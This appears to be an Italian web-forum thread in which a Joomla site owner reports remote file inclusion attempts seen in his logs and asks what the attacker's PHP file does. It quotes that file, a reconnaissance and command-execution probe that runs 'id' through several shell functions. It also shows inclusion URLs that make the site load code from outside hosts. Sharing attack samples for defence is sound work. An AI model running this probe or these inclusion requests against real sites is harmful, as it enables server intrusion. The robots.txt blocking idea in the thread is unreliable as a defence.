Tentativo di hacking o cosa?

[mrcnet]

con joomla 1.5 mi risulta nelle statistiche un accesso da:

   Libwww-perl 5.805 come Browser IP    193.142.214.114

e la pagina visitata è

http:///www.miosito.it/index.php?mode=http://124.0.201.20/bbs000/test.txt?

dove in http://124.0.201.20/bbs000/test.txt?

c'è

Codice: [Seleziona]

<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}


cosa farebbe secondo voi quel codice?

[angelcs]

sono curioso di saperlo anche io, sembra che qualc'uno voleva sapere le caratteristiche del tuo server o sito in modo da trovare delle vulnerabilità.

[mrcnet]

continua  ripassare.. ora sta tendando di caricare quel file tramite wrapper:

index.php?option=com_wrapper&view=wrapper&Itemid=54//index.php?option=com_wrapper&Itemid=1&mosConfig_absolute_path=http://rotcqb.org/administrator/components/pr.txt?

cosa posso fare? pensavo di bloccarlo tramite robots.txt

ma non so che useragent scrivere..

il mio software di statistiche becca:    Libwww-perl 5.805

lo useragent dovrebbe essere libwww-perl/5.808

quindi:

User-agent: libwww-perl/5.808
Disallow: /

[angelcs]

posso consigliarti di segnalare al sito di provenienza il tentativo di includere quel file sul tuo sito. o alla polizia postale con relativi log.

Ma sopratutto sempre che non lo hai gia fatto puoi seguire le istruzioni del wiki sicurezza joomla
http://www.joowiki.com/index.php?option=com_openwiki&Itemid=2&id=manuale_1.0.x:appendice_c

oppure puoi trovare il modo di bloccare quell'indirizzo ma non credo che possa servirti perchè non credo che sia l'unico vero?